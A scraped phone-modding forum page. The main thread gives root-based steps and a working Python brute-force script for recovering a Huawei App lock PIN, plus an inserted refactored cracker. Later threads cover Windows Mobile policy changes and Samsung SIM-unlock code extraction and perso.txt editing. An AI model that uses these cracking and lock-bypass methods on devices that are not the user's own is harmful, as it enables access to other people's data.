How to reset (or bruteforce) EMUI "App lock" PIN [ROOT] - Huawei P20 Pro Guides, News, & Discussion

What to do if you have forgotten the PIN/password for the Huawei EMUI "App lock" feature? I couldn't find an existing solution, so I had to solve the problem myself. I have a Huawei P20 Pro, but this solution is also suitable for other devices running EMUI (Huawei's Android OS).
In my case, my root rights helped me, but if you don't have them, you can probably solve the problem using the ADB console (see UPDATE below).
So, the PIN is stored in the file "/data/misc/hsm/databases/applock.db". If you have root rights, you can delete it (and the other files like "applock.db-shm", "applock.db-wal", "applock.db-journal", etc.), which will reset all the settings for "App lock". Or, using any SQLite editor on a PC, you can open the "applock.db" file and erase the "encrypt_password_sha256_salt" and "encrypt_password_sha256" fields in the "applockpreference" table.
In both cases, restart the phone; the PIN code should disappear.
If you do not have root rights (so you cannot delete/edit the "applock.db" file) but you can read it, then you can use this Python 3 code (you can run it in any online interpreter) to brute-force the PIN in less than a minute:
Code:
import hashlib, binascii

# The two values copied from the "applockpreference" table of applock.db
encrypt_password_sha256_salt = '609605825498166908'
encrypt_password_sha256 = '1000:5b2d362c202d34332c202d32352c202d33332c2034392c2036322c202d38372c2032362c2031312c202d32312c2031352c202d35382c2034312c203132362c2031312c202d34325d:97f6fdf9a44a1f3fb21e2296'

# The stored field has the layout "iterations:hex(PBKDF2 salt):hex(derived key)"
pbkdf2_password = bytes.fromhex(encrypt_password_sha256.split(':')[1])  # decoded bytes, used as the PBKDF2 salt below
needed_hash = encrypt_password_sha256.split(':')[2][:24]                # only the first 12 bytes (24 hex chars) are compared
result = ''
for i in range(0, 10000):                    # every 4-digit PIN, 0000..9999
    pin_str = str(i).zfill(4)
    pin_and_salt = pin_str + encrypt_password_sha256_salt
    sha256_hash = hashlib.sha256(str.encode(pin_and_salt))
    sha256_hash_str = sha256_hash.hexdigest()
    # the hex SHA-256 digest is the PBKDF2 password, the decoded field is the salt, 1000 iterations of HMAC-SHA1
    dk = hashlib.pbkdf2_hmac('sha1', str.encode(sha256_hash_str), pbkdf2_password, 1000)
    if binascii.hexlify(dk)[:24].decode("utf-8") == needed_hash:
        result = pin_str
        break
    if (i + 1) % 1000 == 0:
        print('{}% done'.format((i + 1) // 100))
if result != '':
    print('found: "{}"!'.format(result))
else:
    print('hmm... nothing found :(')
UPD:
I tried to get the "applock.db" file through the ADB console and failed. "/data/misc/hsm/databases" is not accessible, "HwSystemManager.apk" a.k.a. "com.huawei.systemmanager" does not support the "run-as com.huawei.systemmanager" command, and it has an "android:allowBackup=false" param in its manifest, so "adb backup -noapk com.huawei.systemmanager" doesn't work.
So I can summarize that my solution doesn't work without root rights (but if you have them, everything will be fine!).
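Added example, not code from the original post: the derivation the script above encodes, factored into functions so it can be checked and reused. As read from the script, the stored value is PBKDF2-HMAC-SHA1(password = hex(SHA-256(PIN || salt_string)), salt = bytes decoded from the second colon-separated field, iterations = first field), compared on its first 12 bytes. Two things differ from the post's script and are my own generalisation: the iteration count is parsed from the record instead of being hard-coded to 1000, and the search walks 4-digit PINs first and then 6-digit ones in case the lock was set with a longer PIN (a 6-digit sweep is 100x the work, so minutes rather than seconds). `make_record()` exists only to build a record from a known PIN so the cracker can be tested; the column layout of applock.db is not assumed here, you still paste the two field values in by hand. All sample values below are constructed, not taken from a device.

```python
import hashlib
import itertools
import os
from typing import Iterable, Optional, Tuple

TRUNCATED_BYTES = 12  # the stored hash is compared on its first 12 bytes (24 hex chars)


def derive(pin: str, salt_str: str, pbkdf2_salt: bytes, iterations: int) -> str:
    """Reproduce the App lock derivation the post's script uses:
    SHA-256 over PIN||salt_str, its hex digest fed as the password to
    PBKDF2-HMAC-SHA1 with the record's salt bytes; return the truncated hex digest.
    dklen=12 yields exactly the first 12 bytes of the full 20-byte output."""
    inner = hashlib.sha256((pin + salt_str).encode()).hexdigest()
    dk = hashlib.pbkdf2_hmac("sha1", inner.encode(), pbkdf2_salt, iterations, dklen=TRUNCATED_BYTES)
    return dk.hex()


def parse_record(stored: str) -> Tuple[int, bytes, str]:
    """Split the 'iterations:hexsalt:hexhash' field into (iterations, salt bytes, truncated hash)."""
    iters, salt_hex, hash_hex = stored.split(":")
    return int(iters), bytes.fromhex(salt_hex), hash_hex[: TRUNCATED_BYTES * 2].lower()


def candidate_pins(lengths: Iterable[int]) -> Iterable[str]:
    """All numeric PINs of the requested lengths, shortest length first, in ascending order."""
    for n in lengths:
        for digits in itertools.product("0123456789", repeat=n):
            yield "".join(digits)


def crack(salt_str: str, stored: str, lengths: Iterable[int] = (4, 6)) -> Optional[str]:
    """Brute-force the PIN behind one applockpreference record; None if no candidate matches."""
    iterations, pbkdf2_salt, target = parse_record(stored)
    for pin in candidate_pins(lengths):
        if derive(pin, salt_str, pbkdf2_salt, iterations) == target:
            return pin
    return None


def make_record(pin: str, salt_str: str, pbkdf2_salt: bytes, iterations: int = 1000) -> str:
    """Build a record in the same 'iterations:hexsalt:hexhash' layout from a known PIN.
    Test scaffolding only (assumption: a real record comes out of applock.db, not from here)."""
    return f"{iterations}:{pbkdf2_salt.hex()}:{derive(pin, salt_str, pbkdf2_salt, iterations)}"


if __name__ == "__main__":
    # Constructed sample values, not taken from a real device.
    demo_salt_str = "111222333444555666"
    demo_pbkdf2_salt = os.urandom(16)
    record = make_record("1234", demo_salt_str, demo_pbkdf2_salt)
    print("record:", record)
    print("recovered PIN:", crack(demo_salt_str, record, lengths=(4,)))
```

With a real record, call `crack(encrypt_password_sha256_salt, encrypt_password_sha256)` with the two field values copied from the database; the 4-digit space is exhausted in a few seconds with OpenSSL-backed `pbkdf2_hmac`, which is why the post's "less than a minute" holds.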

hioma said:
What to do if you have forgotten the PIN/password for the Huawei EMUI "App lock" feature? I couldn't find an existing solution, so I had to solve the problem myself. I have a Huawei P20 Pro, but this solution is also suitable for other devices running EMUI (Huawei's Android OS).
In my case, my root rights helped me, but if you don't have them, you can probably solve the problem using the ADB console or an advanced file manager.
So, the PIN is stored in the file "/data/misc/hsm/databases/applock.db". If you have root rights, you can delete it (and the other files like "applock.db-shm", "applock.db-wal", "applock.db-journal", etc.), which will reset all the settings for "App lock". Or, using any SQLite editor on a PC, you can open the "applock.db" file and erase the "encrypt_password_sha256_salt" and "encrypt_password_sha256" fields in the "applockpreference" table.
In both cases, restart the phone; the PIN code should disappear.
If you do not have root rights (so you cannot delete/edit the "applock.db" file) but you can read it, then you can use this Python 3 code (you can run it in any online interpreter) to brute-force the PIN in less than a minute:
The password is stored in a secured partition...
This method would be too simple...
Huawei is not stupid... try factory resetting.... Before you factory reset, delete the Google account and log out of the Huawei ID...

spityu85hun said:
The password is stored in a secured partition...
This method would be too simple...
Huawei is not stupid... try factory resetting.... Before you factory reset, delete the Google account and log out of the Huawei ID...
This is not a "guess", this is a working solution. "/data/misc/hsm/databases/" is a secured directory, but (I think) it is accessible through the ADB console (and if you have root rights, it is 100% accessible and editable, so you can clear or "decipher" the PIN, stored as a PBKDF2 key). So you can solve the problem without wiping; I think it's a good solution.

hioma said:
This is not a "guess", this is a working solution. "/data/misc/hsm/databases/" is a secured directory, but (I think) it is accessible through the ADB console (and if you have root rights, it is 100% accessible and editable, so you can clear or "decipher" the PIN, stored as a PBKDF2 key). So you can solve the problem without wiping; I think it's a good solution.
Great... now you've helped thieves hack the App lock PIN...

Related

"Could not update itsutils.dll" unlock cid error

Hi!
I read the wiki page and I searched the forum but I did not find an answer.
When I try to unlock the CID (I have a G3), the cmd screen gives me this message:
"Could not update itsutils.dll to the current version, maybe it is in use? try restarting your device, or restart activesync"
What do I have to do?
Thanks to all.
Copy the files "EnableRapi" and "Cert_SPCS" to your device and run them (you can find them inside the "Utils" folder).
Then run "LokiwizMsl.bat" from your computer again and it should work.
This trick was already described in the SIM unlock part of the wiki,
but I've updated the CID unlock wiki with the info.
Hi!!
I still have that message. Could you check if I'm doing something wrong?
This is the guide from the wiki:
"Do the following:
- Copy the cabs from the Utils folder in the Lokiwiz03a.zip file to your Prophet and execute them (There are two files: "Cert_SPCS.cab" and "EnableRapi.cab")"
Sorry, but this is not very clear because:
1) there isn't a file called "Lokiwiz03a.zip"
2) Do I need to do a hard reset (or a soft reset) after executing those 2 files?
Please help me, I'm not the only one with that problem.
Thanks to all.
Pepez said:
Hi!!
I still have that message. Could you check if I'm doing something wrong?
This is the guide from the wiki:
"Do the following:
- Copy the cabs from the Utils folder in the Lokiwiz03a.zip file to your Prophet and execute them (There are two files: "Cert_SPCS.cab" and "EnableRapi.cab")"
Sorry, but this is not very clear because:
1) there isn't a file called "Lokiwiz03a.zip"
2) Do I need to do a hard reset (or a soft reset) after executing those 2 files?
Please help me, I'm not the only one with that problem.
Thanks to all.
Sorry, that's the file from the SIM unlock part; I've changed the wiki.
The files you need are in pdamobiz.com_downgrade_and_unlockcid.rar
Hi!!! Thanks for your update!
I ran the 2 files from my machine without a hard reset after that.
That solved the Downgrade.bat operation (I did not receive the "itsutils.dll error") but it didn't work with the Cidunlock.bat command.
With the cidunlock.bat command I had the classic error and this one too on the cmd screen:
"CopyFileToTFFS(acidunlocked.bin:0, 0, 00010000)
ERROR: ITWriteDisk - internal error"
After that I made one last experiment.
I tried to update the ROM without unlocking the CID and I discovered that with the Italian Prophet you don't have to unlock the CID.
So I solved my problem!! Thanks to all!
I hope this post helps someone!
Easy fix to the "Could not update itsutils.dll to the current version..." error
1. Use prapi.exe to query the value of policy 4097.
D:\>prapi.exe -q -p 4097
The default is "2".
2. Use prapi.exe to set the value of policy 4097 to "1".
D:\>prapi.exe -p 4097 1
Explanation:
4097 (0x1001) RAPI Policy: The Remote API (RAPI) policy restricts the access of remote applications that are using RAPI to implement ActiveSync operations on mobile devices.
0 - ActiveSync service is shut down. RAPI calls are rejected.
1 - Full access to ActiveSync is provided. RAPI calls are allowed to process without restrictions.
2 - Access to ActiveSync is restricted to the SECROLE_USER_AUTH (User Authenticated) role. RAPI calls are checked against this role mask before they are granted. (default)
Also check: http://www.xs4all.nl/~itsme/projects/xda/smartphone-policies.html

[Q] Help with Unlocking -weird things when trying to unlock Samsung Galaxy Gio

I bought my first smartphone, a Samsung Gio S5660M, and tried to unlock it. I tried different ways but weird things happened and I don't know what causes the problem. I was wondering whether the unlock code would change if I did something to the phone. Now the phone is still locked and I really need and appreciate your help.
First I used the method in the link: http://forum.xda-developers.com/showthread.php?t=1204705 to root and unlock the phone but was not able to finish it. The steps that I have completed are as follows:
To root the phone:
1. Download this file http://www.mediafire.com/download.php?jzvnlbhidsd5f6l
2. Copy root_gb_gio.zip to the root of the SD card and put the card in the phone
3. Shut down the phone.
4. Put the phone in recovery mode (press the Home button + Power button together)
5. In recovery mode, choose Install Update from SD card using the Vol. up / down keys and press the Home key to confirm
6. Search for the root_gb_gio.zip file on the SD card and press the Home key again to run the update
7. Reboot
8. Verify in the app folder that the SuperUser app is installed properly
9. Reboot
Network Unlock (using ADB Shell from PC).
1. Download and install Samsung Kies on the PC from here: http://www.samsungapps.com/about/onPc.as, and also install the Samsung USB Driver
2. Download and install ADB, which comes with the Android SDK, from: http://developer.android.com/sdk/index.html
-Go to the "Available Packages" option in the left menu
-Click on the "Refresh" button at the bottom right and wait until it finishes
-From the items select "Android SDK platform-tools, revision 6"
-Click the "Install Selected" button at the bottom right and wait until it finishes, then close the Android SDK
3. Add the correct path
-Right-click on the Computer icon (on your Desktop) and select "Properties" from the menu
-In the PC Properties select the "Advanced Options" tab
-Click "Advanced System Settings"
-Click "Environment Variables"
-Highlight the "Path" variable and click "Edit"
-At the end of the line (and path) add the path: ;C:\Program Files\Android\android-sdk\platform-tools
4. Connect the phone to the computer via the USB cable
-Click on the Start button and open the "Run" option; in Run type cmd.exe and press Enter. A command prompt window pops up.
-Type the following to get to the ADB shell: cd C:\Program Files\Android\android-sdk\platform-tools
-Type: adb shell
-Now in the adb shell (executing commands on the phone itself)
-Type the next command: su
-The superuser application popped up on the PHONE SCREEN (yes, take a look at the phone screen) asking to allow root privileges to the adb shell. Choose Allow root access for the ADB shell on the phone.
-Type: cd /
-Type: mount -o remount rw /
-Type: mkdir /efs
-Type: mount -o nosuid,ro,nodev -t vfat /dev/block/stl5 /efs
-Type: cat /efs/mits/perso.txt
I got a bunch of characters on the screen and an 8-digit number, the unlock code, which is 28572603
-Type: unmount /efs (It should be umount /efs, but I typed it wrong)
5. Disconnect the USB cable from the phone
6. Turn the phone off and insert the SIM card
7. Turn on the phone
In the last step it should ask for the unlock code to unlock the phone; however, it didn't ask for the unlock code. Instead there was a message: "Phone is SIM Corporate Locked" and there was nowhere to input any code.
When I typed "*#7465625#", the result was as follows: Network Lock [OFF], Network Subset Lock [OFF], SP Lock [OFF], CP Lock [ON]. Note that the corporate lock is on. But I could access the menu with the foreign SIM card in the phone. When I tried to dial "*#7465625*638*28572603" or "#0111*28572603" with or without the foreign SIM card, the message was always something like "network not available" (cannot recall the exact words). When I went to a Fido kiosk for help (the SIM card is from Fido), they told me to unroot the phone so that the phone could ask for the unlock code.
I googled corporate lock/SPCK code on the Internet and there is such a message: "In 1% of cases to unlock Samsung an SPCK code is needed", so I called Samsung for help with the SPCK code. The technical support at Samsung asked me to factory reset the phone by typing "*2767*3855#". After the reset, the status of the locks was still the same as before, as was the message "Phone is SIM Corporate Locked". Then Samsung told me that they don't have the SPCK code. I noticed that the SuperUser icon was still in the menu after the factory reset.
A further search showed the unlock method of mapping the image partition from: http://forum.xda-developers.com/showthread.php?t=1244695 and http://forum.xda-developers.com/showpost.php?p=17148825&postcount=334 (same method). When I went to the shell and typed "su", not sure whether because of the factory reset or not, superuser or admin was denied, so I redid the rooting by following the previous steps, but it only took a few seconds to finish. Then the steps I followed were:
1. First, go to the command line of the PC (Win XP "start->run->cmd")
and type "cd\", now in the root of the hard drive (also tried cd \Program Files\Android\android-sdk\platform-tools)
2. Second, type "adb shell".
3. After that, type "su".
4. Then, type "cat /dev/bml5>/sdcard/bml5.img"
5. Type "exit" twice to disconnect from the Gio.
6. Type "adb pull /sdcard/bml5.img"
But there was an error message "remote object /sdcar/bml5.img does not exist". I just repeated the steps a few minutes ago to get a few screenshots:
(using cd \Program Files\Android\android-sdk\platform-tools)
(using cd \)
(a different error: so I used mount command)
I think at this point (cannot recall whether after the following tries or at this time) I inserted a foreign SIM card, and the phone began to show the message "Network Locked". I took out the foreign SIM card and typed "*#7465625#", and, weirdly enough, the result changed to: Network Lock [ON], Network Subset Lock [OFF], SP Lock [OFF], CP Lock [OFF]. The corporate lock is gone but the network lock came back. I don't know the reason. Is that because I did the factory reset?
I put the foreign SIM card back in the phone and input the unlock code generated earlier, "28572603", but it was not successful. I decided to go back to the first method (ADB shell from PC) to generate the unlock code again to see whether the resulting code was the same. However, weird again, this time there was no code at all. I reproduced the screenshot a moment ago for the result (I had to cut the screen into two halves):
The third method I tried was to unlock the phone using Android Terminal Emulator; the steps were:
- In Android Market, download and install Android Terminal Emulator
- Boot up the Android Terminal Emulator application
- Using the on-screen keyboard, type su, and allow the permission from the prompt
- Type: cd /
- Type: mount -o remount rw /
- Type: mkdir /efs
- Type: mount -o nosuid,ro,nodev -t vfat /dev/block/stl5 /efs
- Type: cat /efs/mits/perso.txt
The desired result should be a bunch of characters on the screen and an 8-digit number. However, I didn't get the desired result; it seems that the result is the same as using the first method after the factory reset. Here is the screenshot (it seems that the shot is incomplete, but I had a hard time getting even such an incomplete shot; the shell would exit when I tried to take the screenshot):
My questions are: why can't the same method generate the same code? Is it because I did something to the phone, like the factory reset? Will the unlock code change because of the situation, or will it always stay the same? Why can't I see bml5.img? Is it possible I damaged it by chance? I am also worried that now even if I buy an unlock code from GSMLiberty, it would not work any more because of what I did to the phone. Is that possible? What are my options now? (I tried the code once, so I still have another two chances to input the unlock code.) Is what has happened weird, or is there a reason for it?
Thank you very much.
I also pulled the perso.txt file onto my PC and reviewed it in XVI32. It does not look like any of the files others mentioned (a lot of 00 or FF followed by a number). Attached here is perso.txt. Is my perso.txt corrupted? If yes, how can I recover it? Thanks.
As far as I know, you're the first person that's reported seeing a CP lock on this phone... One possibility is that this happened instead of plain old bricking when you mistyped the umount command the first time around.
Is your IMEI still intact?
Did you reboot the phone since your third attempt?
Did you by any chance keep the first perso.txt you cat'ed on your first attempt?
The suggestion below is at best a shot in the dark and could very well worsen the situation. With that out of the way...
If your IMEI is still intact, you could try booting into CWM, mounting /efs as rewritable, uploading the attached perso.txt, unmounting /efs and rebooting. The file is simply my own perso.txt, from an unlocked 5660M, with your unlock code put in place of mine in a Unix-line-ending-aware editor. (Another, albeit riskier, possibility would be to mount rewritable in the main OS and cat the file into place, then unmount and reboot.)
Good luck,
Darkshado
Thank you, Darkshado, for answering my questions.
Yes, the IMEI is still intact. What is weird is that now CP is off and network lock is on after I don't know which operation. I thought it should be due to the factory reset, but after the factory reset the status was still CP [ON] and network lock [OFF]. Then I did re-root. The phone was rebooted many times after each attempt, and I only input the unlock code once, so I still have another two chances.
No, I didn't make a copy of the original perso.txt, as I knew almost nothing when I first tried.
About the unmount mistake, is it so severe if there is a typo? My thought was that mounting and unmounting just control access to the file. When we mount a file, we get access to the file. If we forget to unmount it, it leaves a hole for others to access it. Is my understanding right? If yes, the typo in the unmount command in the first method should not be a big deal, as I rebooted the phone after a probably unsuccessful unmount.
As to perso.txt, what I guess is that the file perso.txt contains all the unlock codes and when we input the unlock code on the screen, the system will compare the input code with the code in perso.txt. If they are the same, the unlock succeeds, which is similar to using a password when we log in anywhere. Am I right?
I actually think that uploading your perso.txt might be a solution. But before doing that, I think it is better to compare your perso.txt with another perso.txt from another phone to see whether the difference is only the unlock code. If yes, the solution will succeed. However, if the perso.txt files from different phones are quite different, like the location of the unlock code and other data that is not 00 or FF, there is a good chance that it's very risky. Do you have another perso.txt available? Or does anybody in the forum have a perso.txt available to compare?
My other question is how useful is this perso.txt. If I delete it totally by chance and ask people to unlock the phone from hardware, will the system still operate normally?
I'm going to try to factory reset the phone and re-root again (my PC is in repair and I'll try after I get my PC back) to see whether perso.txt could be restored. Do you have bml5.img on your phone? I don't know why I don't have it on my phone. But from the forum, it looks like bml5.img is very similar to perso.txt, only 00 becomes FF or vice versa.
Thanks again for your help.
SPnewb said:
Thank you, Darkshado, for answering my questions.
Yes, the IMEI is still intact. What is weird is that now CP is off and network lock is on after I don't know which operation. I thought it should be due to the factory reset, but after the factory reset the status was still CP [ON] and network lock [OFF]. Then I did re-root. The phone was rebooted many times after each attempt, and I only input the unlock code once, so I still have another two chances.
That is very strange. What SIMs, if any, did you have in the phone when attempting the unlock at the different stages? Was the Fido SIM in at any time before trying to get an unlock code prompt?
As far as I know, the factory reset operation, at least when triggered from recovery, only wipes the /data and /cache partitions. Is anything done to NV items? I don't have any data to tell.
SPnewb said:
About the unmount mistake, is it so severe if there is a typo? My thought was that mounting and unmounting just control access to the file. When we mount a file, we get access to the file. If we forget to unmount it, it leaves a hole for others to access it. Is my understanding right? If yes, the typo in the unmount command in the first method should not be a big deal, as I rebooted the phone after a probably unsuccessful unmount.
As to perso.txt, what I guess is that the file perso.txt contains all the unlock codes and when we input the unlock code on the screen, the system will compare the input code with the code in perso.txt. If they are the same, the unlock succeeds, which is similar to using a password when we log in anywhere. Am I right?
Your understanding about mounting and unmounting is correct, but I am not certain that perso.txt is actually used by the phone to check the unlock code. It may also be written there for some other reason...
The problem with our phones is that corruption has occurred by merely reading the stl5 partition the wrong way.
SPnewb said:
I actually think that uploading your perso.txt might be a solution. But before doing that, I think it is better to compare your perso.txt with another perso.txt from another phone to see whether the difference is only the unlock code. If yes, the solution will succeed. However, if the perso.txt files from different phones are quite different, like the location of the unlock code and other data that is not 00 or FF, there is a good chance that it's very risky. Do you have another perso.txt available? Or does anybody in the forum have a perso.txt available to compare?
My other question is how useful is this perso.txt. If I delete it totally by chance and ask people to unlock the phone from hardware, will the system still operate normally?
The idea of comparing some perso.txt files is good, but so far all the perso.txt files I've seen uploaded came from the Euro/Asia 5660 Gio, so we'd need files from a 5660M. They did look almost identical to mine though, with essentially a Bell network identifier at the beginning that wasn't present at all in theirs. One person with a 5660 also posted a before/after set, and the file does change a little after the unlock.
I've been reluctant to try too many things on my EFS partition, like deleting perso.txt to see how the phone reacts, for fear of bricking it.
SPnewb said:
I'm going to try to factory reset the phone and re-root again (my PC is in repair and I'll try after I get my PC back) to see whether perso.txt could be restored. Do you have bml5.img on your phone? I don't know why I don't have it on my phone. But from the forum, it looks like bml5.img is very similar to perso.txt, only 00 becomes FF or vice versa.
Thanks again for your help.
There are two "levels" at which you can access the partitions on the phone. stl is a higher-level access, with which you can get correct RFS partitions for instance, while bml is a lower, block-level access. perso.txt is simply a file contained in stl5, also known as the /efs partition. You can read its contents in a round-about way via bml, but you wouldn't want to flash an /efs, /system or /data partition through bml.
Unlike reading stl5, reading bml5 has not caused anyone bricking so far. bml5 is sufficient to get the unlock code as well.
Good luck,
Darkshado
Hi Darkshado,
Thank you very much for your help.
Darkshado said:
That is very strange. What SIMs, if any, did you have in the phone when attempting the unlock at the different stages? Was the Fido SIM in at any time before trying to get an unlock code prompt?
The phone was locked to Bell, and my SIM card is from Fido. I also got a Rogers SIM card for testing. When I rooted and generated the code, I didn't have any SIM card in the phone. When I inserted the Fido card after the first attempt, I got the message "Phone is SIM Corporate Locked" [i.e. when CP lock is ON and the other locks OFF], but I could still use the other functions of the phone. When the CP lock is OFF and Network lock is ON, I could not use the phone at all because the screen asked me to input the unlock code. If there is no input or the code is wrong, I cannot use the phone at all. Without a SIM card, I could still use the other functions of the phone.
Darkshado said:
As far as I know, the factory reset operation, at least when triggered from recovery, only wipes the /data and /cache partitions. Is anything done to NV items? I don't have any data to tell.
What are NV items? Can you tell me where I can see NV items?
Darkshado said:
Your understanding about mounting and unmounting is correct, but I am not certain that perso.txt is actually used by the phone to check the unlock code. It may also be written there for some other reason...
I was wondering whether perso.txt is like a config file?
Darkshado said:
The problem with our phones is that corruption has occurred by merely reading the stl5 partition the wrong way.
perso.txt is simply a file contained in stl5, also known as the /efs partition. You can read its contents in a round-about way via bml, but you wouldn't want to flash an /efs, /system or /data partition through bml.
I cannot think of where I read the partition wrong, other than that I might have typed the wrong unmount the first time, followed by a reboot. I am actually thinking of flashing the phone, but for the moment I have not read anything about flashing yet and have no idea where to find the proper version of the files to flash.
When I pulled perso.txt to the PC, I seem to have used the following method (my PC is still in repair so I cannot verify):
-Type: adb shell
-Now in the adb shell
-Type: su
- allow root privileges to the adb shell.
-Type: mount -o remount rw /
-Type: mkdir /efs
-Type: mount -o nosuid,ro,nodev -t vfat /dev/block/stl5 /efs
-Type: exit twice to exit the shell
-Type: adb pull /efs/mits/perso.txt
-Type: adb shell (to go back to the shell)
-Type: umount
Is there any risk with this method?
About perso.txt,
Darkshado said:
One person with a 5660 also posted a before/after set, and the file does change a little after the unlock.
I will try to see whether I can get some perso.txt files from another forum (redflagdeals). Can you tell me where I can find the before/after set?
Thank you again very much.
Cathy
Hello Cathy,
One big piece of advice I can give you is to try and have a basic understanding of whatever command it is you're typing in an ADB shell.
The "cat" command can take one or many standard inputs (we'll stick to files for now) and output them to a standard output; in our case, the screen or another file.
It's one way of copying a file, or simply seeing its contents, depending on where you send it.
With multiple files in the input, you're concatenating them before they get output.
I would not try the method in your last post AT ALL. You already have your code, and I see no reason why your current perso.txt would be of any use. It is a configuration file, it has to do with the various locks, but I wouldn't be able to tell you more. The way yours has been "corrupted" (I'm employing the term loosely here) may be the reason you've seen that CP lock appear. It may also have altered your Network unlock code in unforeseen ways.
I don't remember anyone trying to directly adb pull perso.txt from the /efs partition off a live phone. Do this at your own risk.
The problems we've seen occur are in all likelihood due to interference between the modem firmware and the higher-level Android OS. That's why even normally "harmless" read commands have caused problems.
The dd command, as well as leaving /efs mounted on a normal-mode phone shutdown, are constants in multiple bricking cases on the Gio and other similar Samsung phones like the Galaxy Ace and Mini.
The lower-level bml5 partition has been deemed safe to read with the dd command so far, even from a live phone.
Completely disable the modem firmware, like in recovery mode, and you can access, and even edit, the /efs partition in a relatively safe manner.
Something interesting happened as I began writing this: I don't know how or when this happened, but I had somehow relocked my phone to Bell!
I decided to try the lock status code you posted above and saw "Network Lock: ON". Slipping another SIM (an unactivated Koodo one) into my Gio prompted for the unlock code, which I typed, and I got a network unlocked message.
I took another look at the perso.txt file I had modified for you and recognized a number near the beginning: 302610, that's the Bell MNC! I rebooted into recovery, mounted /efs and adb pulled perso.txt again (safe because I was in recovery mode). The file has the exact same length, and a few differences visible in Winmerge or a hex editor of your choosing.
It turns out I can relock and unlock my phone as I see fit! I haven't tried, but I wouldn't be surprised if I could even lock my phone to a network other than Bell.
You also asked about NV items: they're phone settings common to all Qualcomm cellular modem based cellphones. GSM and WCDMA antenna power and gain settings, factory test mode, IMEI, there are thousands.
In the case of the Gio, some are accessible off the EFS (stl5) partition in the /nvm/num/ directory. Others, like the IMEI unfortunately, are stored elsewhere in the phone, I don't know where. We can read all the settings by using two leaked Samsung programs, named QPST and QXDM respectively. We can edit some of them, but unless you know exactly what you're doing, this is an easy way to completely mess up a phone.
One last silly question: did you have a MicroSD memory card in the phone when you tried cat'ing bml5 to /sdcard on your second attempt?
Okay. I think there is a way to solve your unusual lock problems; try the following steps:
Get Odin here
Get the latest Odin-flashable Gio ClockworkMod-based recovery available on XDA.
Download the perso_Cathy.txt attached below.
Flash the CWM-based recovery to your phone.
Reboot into recovery mode and connect the phone to your computer.
In Windows Explorer, go to the directory where you've saved perso_Cathy.txt, and shift+right-click on the directory. Open a command line from there. (Otherwise, open a command line window and cd to that directory.)
adb shell (notice your shell is already # aka root)
mount -o nosuid,rw,nodev -t vfat /dev/block/stl5 /efs (notice we're mounting rewritable this time)
exit (this will take you back to the regular command line)
adb push perso_Cathy.txt /efs/mits/perso.txt (so we're pushing and renaming at the same time)
adb shell umount /efs (I doubt this is *really* necessary, but better safe than sorry. You can send single commands to the shell this way)
adb reboot
The phone should already be unlocked on reboot.
Good luck,
Darkshado
Hi Darkshado,
Thank you for your quick response.
Darkshado said:
One big piece of advice I can give you is to try and have a basic understanding of whatever command it is you're typing in an ADB shell.
That's good advice. If I had read the whole thread on unlocking before I began unlocking, there might not have been problems. I began to unlock after reading a few postings. I used Linux a long time ago, but obviously I cannot recall anything now.
I would not try the method in your last post AT ALL. You already have your code, and I see no reason why your current perso.txt would be of any use. It is a configuration file, it has to do with the various locks, but I wouldn't be able to tell you more. The way yours has been "corrupted" (I'm employing the term loosely here) may be the reason you've seen that CP lock appear. It may also have altered your Network unlock code in unforeseen ways.
The code I had was obtained before perso.txt was corrupted. I had a strong feeling that the input unlock code would be compared with the code in perso.txt for unlocking. Otherwise, if perso.txt is not useful any more, why, when I input the initially generated unlock code, is the unlocking not successful? The CP lock is now OFF after perso.txt was corrupted, though it is hard to judge whether CP was ON or not before perso.txt was corrupted, because I got the unlock first and then I saw CP was ON.
I don't remember anyone trying to directly adb pull perso.txt from the /efs partition off a live phone. Do this at your own risk.
Can you tell me what command you use to get perso.txt? From the info below it seems that you use the same or similar commands, but in the recovery mode instead of the normal mode, is it right?
I turns out I can relock and unlock my phone as I see fit! I haven't tried, but I wouldn't be surprised if I could even lock my phone to a network other than Bell.
By editing perso.txt only?
One last silly question: did you have a MicroSD memory card in the phone when you tried cat'ing bml5 to /sdcard on your second attempt?
Yes, since I inserted the MicroSD card into the phone for rooting, I never took it out. But I can hardly imagine this will cause any problem.
I think there is a way to solve your unusual lock problems, try the following steps:
Get Odin here
Get Ingmar Steen's latest Gio ClockworkMod-based recovery here
Download the perso_Cathy.txt attached below.
Flash the CWM-based recovery to your phone.
Reboot in recovery mode and connect the phone to your computer.
In Windows Explorer, go to the directory you've saved perso_Cathy.txt, and shift+right-click on the directory. Open command line from here. (Otherwise, open a command line window and cd to that directory.)
adb shell (notice your shell is already # aka root)
mount -o nosuid,rw,nodev -t vfat /dev/block/stl5 /efs (notice we're mounting rewritable this time)
exit (this will take you back to the regular command line)
adb push perso_Cathy.txt /efs/mits/perso.txt (so we're pushing and renaming at the same time)
adb shell umount /efs (I doubt this is *really* necessary, but better safe than sorry. You can send single commands to the shell this way)
adb reboot
After a second thought, I decided not to flash the memory, since I have little knowledge about it and the tools you mentioned here. As you suggest, I should know enough before doing it. So now I was wondering whether it would solve the problem by just pushing the file perso_Cathy.txt from your above message to /efs/mits/perso.txt in recovery mode. What do you think? Another question is that I wish to back up all the files in the operating system before any more action. Can you tell me how to back up?
My PC is back, but now I cannot even install the Android SDK on the computer, so I have to bring it back for repair. So for the next few days I probably would not be able to try anything, but once I try, I'll let you know the result.
Thank you very much.
Cathy
SPnewb said:
I had a strong feeling that the input unlock code will be compared with the code in perso.txt for unlocking
It most definitely is compared. From what I can tell, perso.txt contains all the SIM-lock information, status and codes.
Can you tell me what command you use to get perso.txt? From the info below it seems that you use the same or similar commands, but in the recovery mode instead of the normal mode, is it right?
Exactly. Recovery mode is what makes the whole thing safe. You need a rooted recovery to do it though.
There are two ways to get the actual perso.txt file off the phone: adb pull (directly or by cat'ing the file to the sd card beforehand) or dd'ing the stl5 partition and extracting perso.txt from it.
By editing perso.txt only?
Yes.
After a second thought, I decided not to flash the memory since I have little knowledge about it and the tools you mentioned here. As you suggest, I should know enough before doing it. So now, I was wondering whether it will solve the problem by just push the file perso_Cathy.txt in your above message to /efs/mits/perso.txt in recovery mode. What do you think?
I'm pretty confident it will solve the problem, otherwise I would not have gone to the trouble of writing these instructions and uploading the file for you.
Another quesion is that I wish to back up all the files in the operating system before any more action. Can you tell me how to back up?
Look here.
My PC is back but now I cannot even install androit SDK on the computer, so I have to bring it back for repair. So the next few days I probably would not be able to try anything, but once I try, I'll let you know the rsult.
